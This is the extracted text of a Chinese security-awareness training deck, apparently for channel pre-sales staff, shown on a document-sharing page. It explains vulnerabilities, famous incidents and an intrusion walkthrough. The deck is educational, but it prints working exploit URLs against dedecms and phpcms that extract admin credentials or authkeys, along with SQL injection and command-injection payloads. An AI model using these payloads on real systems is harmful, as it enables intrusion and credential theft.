收藏 分销(赏)

渠道售前安全初级认证-安全基础-安全知识培训名师优质课获奖市赛课一等奖课件.ppt

上传人:丰**** 文档编号:10269396 上传时间:2025-05-09 格式:PPT 页数:84 大小:7.41MB
下载 相关 举报
渠道售前安全初级认证-安全基础-安全知识培训名师优质课获奖市赛课一等奖课件.ppt_第1页
第1页 / 共84页
渠道售前安全初级认证-安全基础-安全知识培训名师优质课获奖市赛课一等奖课件.ppt_第2页
第2页 / 共84页
点击查看更多>>
资源描述
标题文本,正文级别 1,正文级别 2,正文级别 3,正文级别 4,正文级别 5,*,本幻灯片资料仅供参考,不能作为科学依据,如有不当之处,请参考专业资料。,Sept.,安全知识培训,第1页,培训内容,培训目标,1、安全常识,2、web组成,3、常见web漏洞,4、常见0day攻击,5、黑客入侵流程,了解漏洞、攻击、入侵含义,相关安全常识并了解著名安全事件,以及web常见漏洞,了解黑客常见入侵伎俩和流程,可作为本身安全基础积累和谈资,第2页,安全常识,第3页,安全常识,什么是漏洞,安全漏洞是信息系统在生命周期各个阶段(设计、实现、运维等过程)中产生某类问题,这些问题会对系统安全(机密性、完整性、可用性)产生影响。,Bug,漏洞,漏洞与,Bug,并不等同,他们之间关系基本能够描述为:大部分,Bug,影响功效性,并不包括安全性,也就不组成漏洞;大部分漏洞起源于,Bug,,但并不是全部,它们之间只是有一个很大交集。,第4页,安全常识,什么是攻击,利用网络存在漏洞和安全缺点对网络系统硬件、软件及其系统中数据进行攻击,。包含,主动攻击,:篡改,、伪造消息数据,和拒绝服务攻击(,DDOS,)等,,被动攻击,:流量分析、窃听等,什么是入侵,网络入侵(,hacking,)通常是指含有熟练地编写和调试计算机程序技巧,并使用这些技巧来取得非法或未授权网络或文件访问,入侵进入企业内部网,行为,区分,入侵,是指任何威胁和破坏系统资源行为,攻击是入侵者为进行入侵所采取技术伎俩和方法。,第5页,安全术语,后门,绕过安全控制而获取对程序或系统访问权方法。后门最主要目标就是方便以后再次秘密进入或者控制系统。,webshell,webshell,就是以,asp,、,php,、,jsp,或者,cgi,等网页文件形式存在一个命令执行环境,也能够将其,称作为,一个网页后门。,第6页,安全术语,0day,漏洞,通常是指还没有补丁漏洞。也就是说官方还没有发觉或者是发觉了还没有开发出安全补丁,漏洞,exploit,简称,exp,,漏洞利用,第7页,安全术语,提权,提升自己在服务器中权限,主要针对网站入侵过程中,当入侵某一网站时,经过各种漏洞提升,WEBSHELL,权限以夺得该服务器权限,。,跳板,跳板,简单来说,就是为了隐藏自己地址,让他人无法查找到自己位置。,第8页,安全术语,拖库,网站遭到入侵后,黑客窃取其数据库。,社会工程学,一个经过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如坑骗、伤害等危害伎俩取得本身利益手法,已成快速上升甚至滥用趋势,。,Apt,攻击,高级连续性威胁。利用先进攻击伎俩对特定目标进行长久连续性网络攻击攻击,形式,第9页,安全事件举例,信息泄露事件,1,、快递企业官网遭入侵 泄露,1400,万用户快递数据,年,8,月,12,日,警方破获了一起信息泄露案件,犯罪嫌疑人经过快递企业官网漏洞,登录网站后台,然后再经过上传,(,后门,),工具就能获取该网站数据库访问权限,获取了,1400,万条用户信息,除了有快递编码外,还详细统计着收货和发货双方姓名、电话号码、住址等个人隐私信息。,2,、机锋网,2700,万用户数据泄露,年,1,月,5,日早晨,著名微博账号“互联网那点事”公布消息称,机锋论坛,2300,万用户数据泄露,包含用户名、邮箱、加密密码在内用户信息在网上疯传,提醒用户抓紧修改密码。,第10页,安全事件举例,信息泄露事件,3,、小米,800,万用户数据泄露,4,、,130,万考研用户信息被泄露,5,、智联招聘,86,万条求职简历数据遭泄露,6,、,12306,网站超,13,万用户数据遭泄露,7,、汉庭,万开房统计遭,泄露,第11页,安全事件举例,信息泄露事件,第12页,安全事件举例,DDOS,年,1,月至,6,月,游戏行业大于,300G,以上攻击超出,1800,次,最大峰值为,608G,;游戏企业每个月平均被攻击次数为,800,余次。在,年,1,月至,3,月为攻击最猖獗时期,平均天天有,30,屡次攻击,。,而,在攻击源方面,,94%,攻击源都位于国内,,6%,攻击源来自国外,。,第13页,安全事件举例,病毒木马事件,Wannacry,WannaCry,(又叫,Wanna Decryptor,),一个“蠕虫式”勒索病毒,软件,,由不法分子利用,NSA,(,National Security Agency,,美国国家安全局)泄露危险漏洞“,EternalBlue”,(永恒之蓝)进行,传输。,最新统计数据显示,,100,多个国家和地域超出,10,万台电脑遭到了勒索病毒攻击、,感染,。,勒索病毒是自熊猫烧香以来影响力最大病毒之一。,WannaCry,勒索病毒全球大暴发,最少,150,个国家、,30,万名用户中招,造成损失达,80,亿美元,已经影响到金融,能源,医疗等众多行业,造成严重危机管理问题。中国部分,Windows,操作系统用户遭受感染,校园网用户首当其冲,受害严重,大量试验室数据和毕业设计被锁定加密。部分大型企业应用系统和数据库文件被加密后,无法正常工作,影响巨大,。,第14页,安全事件举例,病毒木马事件,Petya,Petya,是,年,3,月出现一个变体勒索软件,是一个,类似于“,WannaCry”,新勒索病毒,它破坏性比传统勒索软件更大,现已造成俄罗斯石油企业,(RosneftPJSC),和丹麦,A.P.,穆勒,-,马士基有限企业等在内多家大型企业被攻击,而且乌克兰政府系统也遭到了该病毒攻击。并已确认有国内企业中招。腾讯电脑管家称已确认病毒样本经过永恒之蓝漏洞传输,。,北京,时间,年,6,月,27,日晚,乌克兰、俄罗斯、印度、西班牙、法国、英国以及欧洲多国正在遭遇,Petya,类勒索病毒攻击,政府、银行、电力系统、通讯系统、企业以及机场都不一样程度地受到了,影响。,第15页,安全事件举例,病毒木马事件,暗云,III,“暗云”是当前已知复杂度最高、感染用户数量最大木马之一。经过复杂、新奇技术,“暗云”可长久潜伏在用户计算机系统中。中毒用户会成为受控“肉鸡”,作为,DDoS,网络攻击源头,并造成网络变卡、用户信息被窃取等安全问题。有全网普查显示,该木马已感染了数以百万计算机。,第16页,Web,组成,第17页,web应用工作原理,静态网页:,html或者htm,是一个静态页面格式,不需要服务器解析其中脚本。由浏览器如(IE、Chrome等)解析。,1.不依赖数据库,2.灵活性差,制作、更新、维护麻烦,3.交互性交差,在功效方面有较大限制,4.安全,不存在SQL注入漏洞,动态网页:,asp、aspx、php、jsp等,由对应脚本引擎来解释执行,依据指令生成静态网页。,1.依赖数据库,2.灵活性好,维护简便,3.交互性好,功效强大,4.存在安全风险,可能存在SQL注入漏洞,第18页,web应用工作原理,客 户 端,数 据 库,脚本引擎,用户想要查看,一篇报道,这篇报道,id,号为,36,请,求,返,回,访问链接为,*from Article where id=36,向数据库发起查询请求,在Article表中查询id为36全部统计,返回查询到全部统计,处理返回全部统计,如过滤和编码特殊字符等,生成静态网页并返回给客户端,将网站返回网页展示给用户,正惯用户访问网页详细流程以下列图:,第19页,漏洞利用流程,客 户 端,数 据 库,脚本引擎,黑客,想要,获取管理员账号密码,请,求,返,回,黑客结构链接,*from Article where id=36,union select user,pass from admin,,向数据库发起查询请求,在Article表中查询id为36全部统计,并查询了管理员账号密码,返回查询到全部统计,处理返回全部统计,如过滤和编码特殊字符等,生成静态网页并返回给客户端,将网站返回网页展示给用户,(此时内容就含有管理员信息),黑客攻击网站(,sql,注入)详细流程以下列图:,第20页,服务器,Windows,代表:,Windows,、,Windows,、,常见漏洞:,“,永恒之蓝”(,MS17-010,),,MS08-067(,比较古老但很经典漏洞,),Linux,代表,Ubuntu,、,Centos,、,Redha,t,常见漏洞:脏牛漏洞、,sudo,漏洞,第21页,web服务器,Web 服务器也称为 HTTP 服务器,它是响应来自浏览器HTTP请求,而且发送出网页文件软件。,当访问者在浏览器地址文本框中输入一个 URL,或者单击在浏览器中打开 网页上某个链接时,便生成一个网页请求。,常见web服务器:IIS、Apache、Nginx、tomcat、weblogic.,第22页,web服务器,IIS,IIS(Internet,信息服务器)是Internet Information Services缩写,是微软提供Internet服务器软件,包含WEB、FTP、SMTP等服务器组件,。,常见漏洞:,IIS,短文件泄露、,IIS,解析漏洞、,IIS6.0,远程代码执行,Apache,Apache,是Apache软件基金会一个开放源码网页服务器,世界使用排名第一Web,服务器软件,常见漏洞:,apache,解析漏洞、,Apache,日志文件,漏洞,第23页,web服务器,Nginx,Nginx,是一个高性能,HTTP,和反向代理服务器,也是一个,IMAP/POP3/SMTP,服务器,。,常见漏洞:,Nginx,解析漏洞、整数溢出漏洞,Tomcat,Tomcat 服务器是一个无偿开放源代码Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多场所下被普遍使用,是开发和调试JSP 程序首选,。,常见漏洞:,tomcat,弱口令、,tomcat,远程代码执行、当地提权,第24页,web服务器,Weblogic,Weblogic,是一个基于,JAVAEE,架构中间件,,WebLogic,是用于开发、集成、布署和管理大型分布式,Web,应用、网络应用和数据库应用,Java,应用服务器。,常见漏洞:,java,反序列化、,SSRF(,服务器端请求伪造,),第25页,数据库,数据库,数据库是按照数据结构来组织、存放和管理数据“仓库”。,结构化查询语言,结构化查询语言(Structured Query Language)简称SQL,结构化查询语言是一个数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统。,数据库分类,MySQL,、,MSSQL,、,Access,、,Oracle,、,Sqlite,数据库管理软件,P,hpmyadmin,、,navicat,第26页,开发语言及常见框架/cms,PHP,开发框架:,CodeIgniter、ThinkPHP,cms,(内容管理系统):phpcms、dedecms、qibocms.,ASP,cms:aspcms、动易cms、南方数据.,.NET,cms:SiteServer,JSP,开发框架:struts2、Spring MVC,cms:jeecms、大汉,cms,第27页,web,常见架构,LAMP,Linux+Apache+MySQL+PHP,适合用于大型网站架构,稳定性高,常见于企业网站,WAMP,Windows+Apache+MySQL+PHP,适合用于中小型网站架构,易于管理,常见于教育(大学等)、政府事业单位(惯用,phpcms,作为网站,cms,),第28页,web,常见架构,其它常见组合:,PHP+IIS,(,IIS,常和,asp,和,aspx,搭配),部分网站可能会使用这种架构,不过偏少,ASP+IIS,常见于学校,政府(地方)等单位,.NET+IIS,(,aspx,),常见于学校(比如正方教务系统),政府,医院等,部分企业网站也会使用这种架构,JSP+Tomcat,金融、政府(大型,普通市级以上会是,jsp,),大学主站,第29页,常见漏洞,第30页,常见漏洞,A1-,注入,A3-,跨站脚本(,XSS,),A4-,不安全直接对象引用,A5-,安全配置错误,A6-,敏感信息泄露,A7-,功效级访问控制缺失,A8-,跨站请求伪造(,CSRF,),A9-,使用含有已知漏洞组件,A10-,未验证重定向和转发,A2-,失效身份认证和会话管理,第31页,SQL,注入危害,这些危害包含但不局限于:,数据库信息泄漏:数据库中存放用户隐私信息泄露。,网页篡改:经过操作数据库对特定网页进行篡改。,网站被挂马,传输恶意软件:修改数据库一些字段值,嵌入网马链接,进行挂马攻击。,数据库被恶意操作:数据库服务器被攻击,数据库系统管理员帐户被窜改。,服务器被远程控制,被安装后门。经由数据库服务器提供操作系统支持,让黑客得以修改或控制操作系统。,破坏硬盘数据,瘫痪全系统。,一些类型数据库系统能够让,SQL,指令操作文件系统,这使得,SQL,注入危害被深入放大。,第32页,SQL,注入,sql,注入攻击漏洞,攻击者把不可信数据作为命令或者查询语句一部分,发送给解释器,以执行计划外命令或者在未被恰当授权时访问数据。,举个例子,:,网站后台代码,sql,语句构建以下,$sql=“select*from user where id=$id”,正常,url,以下,and 1=1,后台语句构建以下,select*from user where id=1 and,1=1,会返回和,id=1,一样回显信息。,若是访问,and 1=2,后台语句构建以下,select*from user where id=1 and,1=2,会返回和,id=1,不一样回显信息,and 1=1,和,and 1=2,都是注入,sql,语句,将其换成特定语句会造成攻击者执行任意,sql,语句。,第33页,SQL,注入直观效果,Sqlmap SQL,注入爆出数据库表名,第34页,SQL,注入防御,过滤特殊字符:,单引号、双引号、斜杠、反斜杠、冒号、空字符等字符,过滤对象,:,用户输入,提交,URL,请求中参数部分,从,cookie,中得到数据,布署防,SQL,注入系统或脚本,第35页,跨站脚本(,XSS,)危害,网络钓鱼,包含盗取各类用户账号,窃取用户,cookie,资料,从而获取用户隐私信息,或利用用户身份深入对网站执行操作,劫持用户(浏览器)会话,从而执行任意操作,比如进行非法转账,强制发表日志,发送电子邮件等,强制弹出广告页面,刷流量等,网页挂马,进行恶意操作,比如任意篡改页面信息,删除文章等,进行大量客户端攻击,如,DDOS,攻击,获取客户端信息,比如用户浏览历史,真实,ip,,开放端口等,控制受害者机器向其它网站发起攻击,结合其它漏洞深入扩大攻击,提升用户权限,包含深入渗透网站,传输,XSS,跨站脚本蠕虫等,。,第36页,跨站脚本(,XSS,),当应用程序收到含有不可信数据,在没有进行适当验证和转义情况下,就将它发送给一个网页浏览器,这就会产生跨站脚本攻击(简称,XSS,)。,举个例子,后台代码以下,:,访问正常,url,以下,cookie,第39页,WEBSHELL,webshell,就是以,asp,、,php,、,jsp,或者,cgi,等网页文件形式存在一个命令执行环境,也能够将其称做为一个网页后门。黑客在入侵了一个网站后,通常会上传,webshell,,得到一个命令执行环境,以到达控制网站服务器目标。,WEBSHELL,危害,:,拿到了网站,WebShell,,就能够修改网站文件了!比以下载文件,修改文件,删除文件等,将变得非常轻易。,拿到,WebShell,权限后,假如磁盘做了安全设置以及站点独立权限设置,则这个,WebShell,可能只能对当前站点有效,无法操作其它网站程序。假如入侵者经过执行命令,提升网站权限后,就能够发展到入侵服务器,进而创建管理用户,到达控制整台服务器目标。,第40页,WEBSHELL,一句话,webshell,大马,webshell,第41页,跨站请求伪造,(CSRF),跨站请求伪造,也叫,CSRF,。该攻击让登录用户浏览器将伪造,HTTP,请求,包含该用户会话,cookie,和其它认证信息,发送到一个存在,CSRF,漏洞,web,应用程序,该,web,程序将会搜集这些请求。,下面将演示经过,CSRF,漏洞在用户不知情情况下修改用户密码例子。,也能够这么了解,CSRF,攻击:攻击者盗用了你身份,以你名义进行一些非法操作。,CSRF,能够使用你账户发送邮件,获取你敏感信息,甚至盗走你财产等。,第42页,CSRF,攻击原理概要,Web A,为存在,CSRF,漏洞,Web B,为攻击者恶意网站,User C,为,Web A,用户,正常情况下,:,A,网站修改密码请求是,A,网站信息信任从网站,b,发来请求,认为是用户正当请求,用户密码被修改为,newpass,。,提交该请求后,密码修改为,newpass,。,第43页,CSRF,防御,验证,HTTP Referer,字段,Token,验证,添加验证码,第44页,系统命令注入危害,造成攻击者执行任意系统命令,控制主机权限。,注入系统命令查看系统用户。,第45页,系统命令注入,系统命令注入和,sql,注入类似。,不一样点是,sql,注入注入是,sql,语句,系统命令注入注入是系统命令。,前者造成执行任意,sql,语句,后者造成执行任意系统命令。,举个例子,后台代码以下,正常请求,&net user,执行命令就是,ping,&net user,也就是连续执行了两条命令。后面注入,net user,也被执行。,第46页,系统命令注入防御,尽可能不要使用系统命令,在进入执行命令函数,/,方法之前,变量一定要做好过滤,对敏感字符转义,在使用动态函数之前,确保使用函数是指定函数之一,第47页,文件包含危害,1,读取敏感信息文件。,Windows/system.ini,或者是,/etc/passwd,等,2,远程包含,webshell,。,3,当地包含配合文件上传,getshell,。,第48页,文件包含,开发人员通常会把可重复使用函数写到单个文件中,在使用一些函数时,直接调用此文件,而无须再次编写,这种调用文件过程被称为包含。,文件包含漏洞产生原因是在经过引入文件时,因为传入文件名没有经过合理校验,或者校检被绕过,从而操作了预想之外文件,就可能造成意外文件泄露甚至恶意代码注入。,举个例子,后台语言以下:,正常,url,以下:,信息。(逻辑上本不允许),那么遍历这些,Id,,就能够搜集很多敏感信息。,第55页,越权防御,完善代码逻辑:,1,结合,session,认证,当用户发起对一个数据资源请求时,依据,session,中用户,id,联合查询,倘若这个资源不属于这个用户,则不予查询。,2,针对水平越权,能够增加资源唯一标识符复杂度,能够将其变成几十位无规律字符串,增加水平越权难度。不过该方法理论上依然能被暴力破解。,第56页,常见,0day,攻击,第57页,什么是,0day,0day,漏洞,通常是指还没有补丁漏洞。也就是说官方还没有发觉或者是发觉了还没有开发出安全补丁漏洞,0day,攻击,利用,0day,漏洞进行攻击,特点是利用简单,危害较大,第58页,常见,0day,struts2,Struts2,框架存在漏洞,平时说存在,struts2,漏洞是指,远程命令,/,代码执行漏洞,影响范围,年,3,月份汇报:,第59页,常见,0day,struts2,Struts2,漏洞有很多,比较著名几个远程命令,/,代码执行漏洞:,名称,影响版本,危害,S2-016,Struts 2.0.0-Struts 2.3.15,可获取服务器权限,S2-032,Struts 2.3.20-StrutsStruts 2.3.28(except 2.3.20.3 and 2.3.24.3),S2-037,Struts 2.3.20-StrutsStruts 2.3.28.1,S2-045,Struts 2.3.5-Struts 2.3.31,Struts 2.5-Struts 2.5.10,S2-046,Struts 2.3.5-Struts 2.3.31,Struts 2.5-Struts 2.5.10,S2-048,Struts 2.3.x with Struts 1 plugin and Struts 1 action,第60页,常见,0day,struts2,利用该漏洞可执行任意操作,比如上传,shell,,添加管理员账号等,下列图我们展示是查询,os,版本信息,以证实漏洞存在,第61页,常见,0day,java,反序列化,Java,序列化,把,Java,对象转换为字节序列过程便于保留在内存、文件、数据库中,,ObjectOutputStream,类,writeObject(),方法能够实现,序列化。,Java,反序,列化,把,字节序列恢复为,Java,对象过程,,ObjectInputStream,类,readObject(),方法用于反序列化。,影响范围,WebLogic,、,WebSphere,、,JBoss,、,Jenkins,、,OpenNMS,这些大名鼎鼎,Java,应用,都受到影响,危害,造成,远程代码执行,获取服务器,权限,第62页,常见,0day,java,反序列化,直接布署一个,webshell,,利用非常简单,第63页,常见,0day,bash,破壳漏洞,Bash,漏洞,bash,漏洞源于在调用,Bash Shell,之前能够用结构值创建环境变量。因为没有对输入环境变量进行检测,攻击者能够在输入变量时候能够包含恶意代码,在,Shell,被调用后会被马上执行。,影响范围,影响当前主流操作系统平台,包含但不限于,Redhat,、,CentOS,、,Ubuntu,、,Debian,、,Fedora,、,Amazon Linux,、,OS X 10.10,等平台,危害,黑客利用该漏洞,能够执行任意代码,甚至能够不需要经过认证,就能远程取得系统控制权,包含执行恶意程序,或在系统内植入木马,或获取敏感信息,。,第64页,常见,0day,心脏滴血漏洞,心脏滴血,漏洞(,OpenSSL,心脏滴血漏洞,),未能正确检测用户输入参数长度,攻击者能够利用该漏洞,远程读取存在漏洞版本,OpenSSL,服务器内存中,64K,数据,获取内存中用户名、密码、个人相关信息以及服务器证书等私密信息。,影响范围,该漏洞披露时,约有,17%,(大约五十万)经过认证机构认证互联网安全网络服务器轻易受到,攻击,危害,经过多个测试实例表明,依据对应,OpenSSL,服务器承载业务类型,攻击者普通可取得用户,X.509,证书私钥、实时连接用户账号密码、会话,Cookies,等敏感信息,深入可直接取得相关用户权限,窃取私密数据或执行非授权操作。,第65页,常见,0day,永恒之蓝,永恒之蓝(英语:,EternalBlue,),美国,国家,安全局(,NSA,)开发,漏洞利用程序,,于,年,4,月,14,日被黑客组织影子掮客,泄漏。,Wannacry,传输利用是,windows,smb,漏洞,,,漏洞补丁是,MS17-010,影响范围,大多数,windows,系统都受到影响(已经有相关补丁),危害,获取服务器权限,第66页,常见,0day,samba,漏洞,linux,版“永恒之蓝”,,CVE-7494,差异,Windows,SMB,服务默认开启,,Samba,在大多数,Linux,发行版中需要手动,开启,影响范围,漏洞影响,Samba3.5.0,及,3.5.0,和,4.6.4,之间任意版本(不包含,4.5.10,、,4.4.14,、,4.6.4,)。,危害,可直接获取服务器,shell,第67页,常见,0day,samba,漏洞,如图,该漏洞利用模块已集成到了,metasploit,当中,无需交互即可利用,该图片展示是已获取到服务器,shell,,能够对服务器进行任何操作,第68页,常见,0day,dedecms,Dedecms,织梦内容管理系统,recommend.php,存在,sql,注入,利用,EXP,:,url,/,plus/recommend.php?action,=&aid=1&_FILEStypetmp_name=%27%20or%20mid=%27%20/*!50000union*/*!50000select*/1,2,3,(select%20CONCAT(0 x7c,userid,0 x7c,pwd)+from+%23_admin%20limit+0,1),5,6,7,8,9%23&_FILEStypename=1.jpg&_FILEStypetype=application/octet-stream&_FILEStypesize=4294,危害:上述,exp,可获取管理员密码,第69页,常见,0day,dedecms,若存在该漏洞,访问上述链接即可取得管理员账号密码,以下列图:,第70页,常见,0day,phpcms,Phpcms,,,PHPCMS V9,内容管理,系统,Authkey,泄露、,17,年最新,getshell,0day,Authkey,泄露,利用,EXP,:,http,:/url/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=662dCAZSAwgFUlUJBAxbVQJXVghTWVQHVFMEV1MRX11cBFMKBFMGHkUROlhBTVFuW1FJBAUVBwIXRlgeERUHQVlIUVJAA0lRXABSQEwNXAhZVl5V,危害:若存在该漏洞,访问上述链接,authkey,会泄露,可利用,authkey,进行注入,第71页,黑客入侵流程,第72页,情景说明,内网说明:内网中有若干网段。外网服务器区,内网服务器区,办公,pc,区。各个网段经过路由器相互通信。,Internet,OA/ERP,vlan10,192.168.10.0/24,财务部,技术部,门户,攻击目标,跳板,2,pc,跳板,1,web,坏小子,某天,坏小子接到一个入侵某企业内网,erp/oa,系统活,不过该系统只对内网开放,公网上坏小子无法直接访问。,那么,坏小子是怎样一步步入侵该内网服务呢?,第73页,入侵思绪,为了入侵内网,erp/oa,系统,黑客必须首先拿到内网中一台主机权限,将其作为跳板机横向移动,继续入侵,erp,系统。,怎样取得内网中一台主机权限,第74页,思绪,1,:拿下某一服务器,下面给出一个利用高危漏洞,-,利用,sql,注入,getshell,实例。,第75页,Sql,注入,getshell,流程,第76页,Sql,注入,getshell,流程,黑客经过扫描,发觉,sql,注入漏洞,使用,sqlmap,注入得到管理员账号密码,解密密码,利用账号登录后台,上传,webshell,第77页,思绪,2,:拿下某一,PC,第78页,入侵思绪,至此,黑客已经得到了一台内网主机权限。,下一步就是利用该跳板机横向移动,内网渗透。获取内网中更有价值信息。,比如,erp,系统,或者其它数据服务器。,第79页,横向移动,第80页,横向移动,扫描内网,第81页,横向移动,获取关键数据,第82页,内网沦陷,组建僵尸网络,全部文件被勒索软件加密为,MP4,文件,第83页,深圳市南山区学苑大道1001号南山智园A1栋,0755-86627888,market,第84页,
展开阅读全文

开通  VIP会员、SVIP会员  优惠大
下载10份以上建议开通VIP会员
下载20份以上建议开通SVIP会员


开通VIP      成为共赢上传
相似文档                                   自信AI助手自信AI助手

当前位置:首页 > 包罗万象 > 大杂烩

移动网页_全站_页脚广告1

关于我们      便捷服务       自信AI       AI导航        抽奖活动

©2010-2025 宁波自信网络信息技术有限公司  版权所有

客服电话:4009-655-100  投诉/维权电话:18658249818

gongan.png浙公网安备33021202000488号   

icp.png浙ICP备2021020529号-1  |  浙B2-20240490  

关注我们 :微信公众号    抖音    微博    LOFTER 

客服